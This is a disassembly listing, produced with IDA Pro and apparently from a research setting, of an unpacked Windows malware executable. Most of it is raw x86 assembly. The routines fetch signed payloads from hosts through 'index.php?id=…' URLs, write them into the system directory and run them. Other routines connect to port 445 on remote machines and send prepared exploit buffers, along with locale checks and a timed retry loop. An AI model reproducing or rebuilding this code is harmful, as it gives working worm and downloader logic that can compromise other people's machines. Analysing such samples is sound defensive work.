;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 4F3F7FF5AC7C9C1C05D1A3BC71DCA31C
; File Name : u:\work\4f3f7ff5ac7c9c1c05d1a3bc71dca31c_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31421000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31421000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31421004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31421008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3142100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31422882+1D�r
dword_31421010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31421014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31422882+4E�r ...
dword_31421018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3142101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31421020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31421024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31421028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3142102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31421030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31421034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31421038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31421040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31421044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31421048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3142104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31421050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31421054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31421058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3142105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31421060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31421064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31421068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31422B67+8F�r
dword_3142106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31421070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31421074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31422A9B+F�r
dword_31421078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3142107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314211A0+F6�r ...
dword_31421080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_314221C4+57�r
dword_31421084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31421422+64�r ...
dword_31421088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31422A9B+40�r
dword_3142108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31422A9B+1B�r
dword_31421090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31421094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31421801+16C�r ...
dword_31421098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3142109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314210A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314210A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31421DF0+2C�r
dword_314210A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_314223B2+116�r
dword_314210AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314210B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3142292E+92�r
dword_314210B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31422336�r
dword_314210B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314210BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314210C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31421F52+12�r
dword_314210C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314210C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314210CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314210D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_314221C4+66�r ...
dword_314210D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_314225C3+3F�r ...
dword_314210D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314210DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314210E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31422A9B+C3�r
dword_314210E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_314210EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314210F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314210F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314210F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314210FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31421F73:loc_31421F84�r ...
; ---------------------------------------------------------------------------
loc_31421100: ; DATA XREF: UPX0:loc_31422CD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31421104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3142207E:loc_314220AF�r ...
dword_31421108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31421422+AA�r
align 10h
dword_31421110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31421114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31421118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3142111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_314215C7+77�r ...
dd 0
dword_31421124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_314215C7+9D�r
dword_31421128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_314215C7+89�r
dword_3142112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31421130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:314227A2�r
dword_31421134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_314215C7+B0�r
dd 0
dword_3142113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31421140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31421144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31421148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3142114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31421150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31421154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31421158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_314221C4+AC�r
dword_3142115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31422712+D�r
dword_31421160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_314221C4+F0�r
dword_31421164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31421168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3142207E+67�r ...
dword_3142116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31421801+1D8�r ...
dword_31421170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3142207E+128�r
dword_31421174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3142207E+12F�r
align 10h
dword_31421180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_31421190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314211A0 proc near ; CODE XREF: sub_31421422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_314211CB
push 1
jmp loc_31421261
; ---------------------------------------------------------------------------
loc_314211CB: ; CODE XREF: sub_314211A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3142108C ; GetSystemDirectoryA
mov edi, dword_31421088
lea eax, [ebp+var_110]
push offset dword_314241F8
push eax
call edi ; dword_31421088
lea eax, [ebp+var_110]
push 6
push eax
call dword_31421084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31421F73
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314241F0
push eax
call edi ; dword_31421088
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31421080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31421241
push 2
jmp short loc_31421261
; ---------------------------------------------------------------------------
loc_31421241: ; CODE XREF: sub_314211A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31421124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31421264
push [ebp+var_4]
call dword_3142107C ; CloseHandle
push 3
loc_31421261: ; CODE XREF: sub_314211A0+26�j
; sub_314211A0+9F�j
pop eax
jmp short loc_314212B5
; ---------------------------------------------------------------------------
loc_31421264: ; CODE XREF: sub_314211A0+B4�j
mov edi, 100000h
push edi
call sub_31422CA5
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31421134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31421078 ; WriteFile
push [ebp+var_4]
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31421FA3
push ebx
call sub_31422CB9
add esp, 0Ch
xor eax, eax
loc_314212B5: ; CODE XREF: sub_314211A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314211A0 endp
; =============== S U B R O U T I N E =======================================
sub_314212BA proc near ; CODE XREF: sub_31421422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314212D1: ; CODE XREF: sub_314212BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_314212D1
pop edi
pop esi
pop ebx
retn
sub_314212BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421316 proc near ; CODE XREF: sub_3142139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31421349
add ebx, 1Ah
loc_31421349: ; CODE XREF: sub_31421316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31421108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421373: ; CODE XREF: sub_31421316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421393: ; CODE XREF: sub_31421316+68�j
mov al, [ebp+arg_0]
loc_31421396: ; CODE XREF: sub_31421316+5B�j
; sub_31421316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142139B proc near ; CODE XREF: sub_31421422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314213F8
mov edi, [ebp+arg_0]
push ebx
loc_314213B0: ; CODE XREF: sub_3142139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31421316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314213DC
cmp bl, 7Ah
jg short loc_314213DC
movsx esi, bl
sub esi, 61h
loc_314213DC: ; CODE XREF: sub_3142139B+34�j
; sub_3142139B+39�j
cmp bl, 41h
jl short loc_314213EC
cmp bl, 5Ah
jg short loc_314213EC
movsx esi, bl
sub esi, 41h
loc_314213EC: ; CODE XREF: sub_3142139B+44�j
; sub_3142139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314213B0
pop ebx
jmp short loc_314213FB
; ---------------------------------------------------------------------------
loc_314213F8: ; CODE XREF: sub_3142139B+F�j
mov edi, [ebp+arg_0]
loc_314213FB: ; CODE XREF: sub_3142139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3142139B endp
; =============== S U B R O U T I N E =======================================
sub_31421402 proc near ; CODE XREF: sub_31421422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31421406: ; CODE XREF: sub_31421402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31421406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31421402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421422 proc near ; CODE XREF: sub_314215C7+BA�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421180
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31421104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_314215A8
add edi, 4
mov [ebp+var_130], edi
jz loc_314215A8
push edi
call dword_31421084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_314215A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_314215A8
cmp ebx, 1Ah
jge loc_314215A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_31421108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314215A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3142139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_314212BA
lea eax, [ebp+var_164]
push eax
call sub_31421402
add esp, 1Ch
cmp [esi], al
jnz short loc_314215A8
push 44h
push offset dword_31424000
lea eax, [ebp+var_124]
push eax
call sub_3142172F
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3142179A
add esp, 18h
test eax, eax
jnz short loc_3142159B
cmp [ebp+var_174], edi
jz short loc_3142159B
lea eax, [ebp+var_11C]
push eax
call sub_314211A0
pop ecx
mov [ebp+var_128], edi
loc_3142159B: ; CODE XREF: sub_31421422+15C�j
; sub_31421422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3142177E
pop ecx
loc_314215A8: ; CODE XREF: sub_31421422+4E�j
; sub_31421422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314215C7 proc near ; CODE XREF: sub_314216A2+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31422CA5
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31421090 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_3142162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31424FEC
push dword_31425004
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3142111C ; wsprintfA
add esp, 1Ch
jmp short loc_31421647
; ---------------------------------------------------------------------------
loc_3142162F: ; CODE XREF: sub_314215C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
loc_31421647: ; CODE XREF: sub_314215C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31421124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31421134 ; InternetReadFile
push esi
mov [ebp+arg_4], eax
call sub_31421422
push esi
call sub_31422CB9
mov esi, dword_3142112C
pop ecx
pop ecx
push ebx
call esi ; dword_3142112C
push edi
call esi ; dword_3142112C
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_314215C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_314216A2 proc near ; DATA XREF: sub_314223B2+15B�o
push ebx
mov ebx, dword_31421098
push esi
push edi
loc_314216AB: ; CODE XREF: sub_314216A2+88�j
xor esi, esi
mov edi, 46021h
loc_314216B2: ; CODE XREF: sub_314216A2+86�j
inc esi
inc esi
call sub_31422038
test eax, eax
jz short loc_314216FC
mov al, byte_31424080[esi+esi*4]
push eax
push off_31424081[esi+esi*4]
call sub_314215C7
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314216FC
push 0
push offset dword_31425004
call ebx ; dword_31421098
push 0
push offset dword_31424FEC
call ebx ; dword_31421098
loc_314216FC: ; CODE XREF: sub_314216A2+19�j
; sub_314216A2+46�j
call dword_314210FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31422068
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31421094 ; Sleep
cmp esi, 16h
jb short loc_314216B2
jmp loc_314216AB
sub_314216A2 endp
; =============== S U B R O U T I N E =======================================
sub_3142172F proc near ; CODE XREF: sub_31421422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31421034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 8
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 1
pop eax
jmp short loc_3142177A
; ---------------------------------------------------------------------------
loc_3142175C: ; CODE XREF: sub_3142172F+19�j
; sub_3142172F+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31421038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3142177A: ; CODE XREF: sub_3142172F+2B�j
pop edi
pop esi
pop ebx
retn
sub_3142172F endp
; =============== S U B R O U T I N E =======================================
sub_3142177E proc near ; CODE XREF: sub_31421422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3142102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31421030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3142177E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142179A proc near ; CODE XREF: sub_31421422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3142101C ; CryptCreateHash
test eax, eax
jnz short loc_314217C0
push 1
pop eax
jmp short loc_314217FD
; ---------------------------------------------------------------------------
loc_314217C0: ; CODE XREF: sub_3142179A+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421020 ; CryptHashData
test eax, eax
jnz short loc_314217D9
push 2
pop edi
jmp short loc_314217F2
; ---------------------------------------------------------------------------
loc_314217D9: ; CODE XREF: sub_3142179A+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31421024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314217F2: ; CODE XREF: sub_3142179A+3D�j
push [ebp+arg_0]
call dword_31421028 ; CryptDestroyHash
mov eax, edi
loc_314217FD: ; CODE XREF: sub_3142179A+24�j
pop edi
pop esi
pop ebp
retn
sub_3142179A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421801 proc near ; CODE XREF: sub_3142255F+36�p
; sub_314225C3+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31422CF0
mov eax, dword_31424C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31424C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31421158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31421D61
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3142115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3142109C ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31424C78
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31421874: ; CODE XREF: sub_31421801+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31421874
push 60h
lea eax, [ebp+var_E4]
push offset dword_31424798
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31422CE2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31422CDC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31422CE2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31422CD6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31421160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31421164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31421D57
mov esi, dword_31421094
mov edi, 0C8h
push edi
call esi ; dword_31421094
push ebx
mov ebx, dword_31421168
push 89h
push offset dword_31424580
push [ebp+var_4]
call ebx ; dword_31421168
